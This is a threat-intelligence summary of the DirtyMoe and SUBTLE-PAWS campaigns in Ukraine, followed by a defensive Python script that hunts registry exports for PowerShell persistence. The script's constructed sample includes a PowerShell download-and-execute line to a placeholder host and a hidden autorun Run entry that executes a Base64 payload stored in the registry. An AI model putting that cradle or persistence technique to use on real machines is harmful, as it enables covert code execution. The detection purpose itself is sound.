February 4, 2024 at 12:19PM
CERT-UA has warned that more than 2,000 computers in Ukraine are infected with the DirtyMoe malware and attributed the campaign to the threat actor it tracks as UAC-0027. DirtyMoe is used for cryptojacking and DDoS attacks and is spread through the Purple Fox malware and fake software installers. A separate campaign, tracked as STEADY#URSA, targets Ukrainian military personnel with a PowerShell backdoor called SUBTLE-PAWS and is attributed to Gamaredon, a group linked to Russia's Federal Security Service (FSB).
Key takeaways:
1. The Computer Emergency Response Team of Ukraine (CERT-UA) warned that the DirtyMoe malware has infected over 2,000 computers in the country and attributed the campaign to the threat actor UAC-0027. DirtyMoe is capable of both cryptojacking and DDoS attacks.
2. DirtyMoe is distributed through Purple Fox and fake software installers. In an unrelated campaign, an ongoing phishing operation targeting Ukrainian military personnel delivers the SUBTLE-PAWS PowerShell backdoor.
3. SUBTLE-PAWS avoids dropping a conventional executable: it stores PowerShell code in the Windows Registry, reads it back at runtime, and executes its payloads dynamically, which gives it persistence on the infected host while keeping its on-disk footprint small enough to evade file-based detection.
4. Recommended mitigations: keep systems patched and up to date, enforce network segmentation, and monitor network traffic for anomalous activity (for DirtyMoe, that includes unexpected connections to cryptocurrency mining pools and bursts of outbound DDoS traffic).
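As an added example (not code from CERT-UA, the original article, or any of the malware families named above), the following Python script hunts for the registry-resident PowerShell pattern described in takeaway 3: an autorun value that launches PowerShell with evasive switches, and a registry value whose data is itself a PowerShell script, plain or Base64-encoded. It parses a `.reg` export of the kind produced by `reg export`. The sample export, the value names and the key path `HKCU\Software\Contoso` are constructed for this example and are not indicators of SUBTLE-PAWS; the regexes are generic PowerShell-abuse heuristics, not the campaign's real IOCs.

```python
"""Hunt a .reg export for PowerShell staged in the Windows Registry.

Two heuristics:
  * autorun-powershell : a Run/RunOnce value that starts powershell/pwsh
                         with hidden-window, no-profile, encoded-command,
                         IEX or registry-read switches
  * stored-script-*    : any value whose data (plain, or Base64 of UTF-8 /
                         UTF-16LE text) looks like PowerShell code
"""
import base64
import re
import sys

PS_LAUNCH = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
SUSPICIOUS_SWITCHES = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand|nop|noprofile|w|windowstyle|ep|executionpolicy)\b"
    r"|\biex\b|invoke-expression|get-itemproperty|\bgp\b|downloadstring",
    re.I,
)
PS_PAYLOAD = re.compile(
    r"\$\w+\s*=|\biex\b|invoke-expression|new-object\s+net\.webclient"
    r"|downloadstring|frombase64string",
    re.I,
)
B64 = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
VALUE_LINE = re.compile(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$')
AUTORUN_SUFFIXES = ("\\currentversion\\run", "\\currentversion\\runonce")

# Constructed sample, not a real capture. The payload is stored UTF-16LE/Base64,
# the form [Convert]::FromBase64String + Unicode.GetString expects.
PAYLOAD_SCRIPT = "$c = New-Object Net.WebClient; iex $c.DownloadString('http://example.invalid/s.ps1')"
PAYLOAD_B64 = base64.b64encode(PAYLOAD_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"',
    r'"Updater"="powershell.exe -w hidden -nop -c \"iex ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((gp HKCU:\\Software\\Contoso).payload)))\""',
    "",
    r"[HKEY_CURRENT_USER\Software\Contoso]",
    '"payload"="%s"' % PAYLOAD_B64,
])


def unescape(s):
    """Undo .reg string escaping: \\\\ -> \\ and \\" -> "."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Yield (key, name, data) for REG_SZ values; hex:/dword: values are skipped."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_LINE.match(line)
        if key is None or m is None:
            continue
        name = m.group(1) if m.group(1) is not None else "(Default)"
        rhs = m.group(2)
        if len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
            yield key, name, unescape(rhs[1:-1])


def decode_b64_text(data):
    """Return the text behind a Base64 blob (UTF-8 or UTF-16LE), else None."""
    if not B64.match(data):
        return None
    try:
        raw = base64.b64decode(data, validate=True)
    except ValueError:
        return None
    # UTF-8 first: UTF-16LE ASCII decodes as UTF-8 but contains NULs, which fail
    # the printable check and fall through to the UTF-16LE attempt.
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    return None


def scan_reg_export(text):
    """Return a list of findings, each {key, name, rule, detail}."""
    findings = []
    for key, name, data in parse_reg(text):
        in_autorun = key.lower().endswith(AUTORUN_SUFFIXES)
        if in_autorun and PS_LAUNCH.search(data) and SUSPICIOUS_SWITCHES.search(data):
            findings.append({"key": key, "name": name, "rule": "autorun-powershell", "detail": data})
        decoded = decode_b64_text(data)
        if decoded is not None and PS_PAYLOAD.search(decoded):
            findings.append({"key": key, "name": name, "rule": "stored-script-b64", "detail": decoded})
        elif not in_autorun and PS_PAYLOAD.search(data):
            findings.append({"key": key, "name": name, "rule": "stored-script-plain", "detail": data})
    return findings


if __name__ == "__main__":
    # reg export writes UTF-16LE with a BOM; "utf-16" handles both.
    text = open(sys.argv[1], encoding="utf-16").read() if len(sys.argv) > 1 else SAMPLE_REG
    for f in scan_reg_export(text):
        print(f"[{f['rule']}] {f['key']}\\{f['name']}: {f['detail'][:120]}")
```

Run it against `reg export HKCU\Software out.reg` (and the HKLM hive with the same Run key) to cover the usual autorun locations; on a live host the same check can be done directly with `Get-ItemProperty` over the Run keys. The parser deliberately ignores `hex:` (REG_BINARY) values and line continuations, so a payload stored as binary would need the decoder extended before it is flagged.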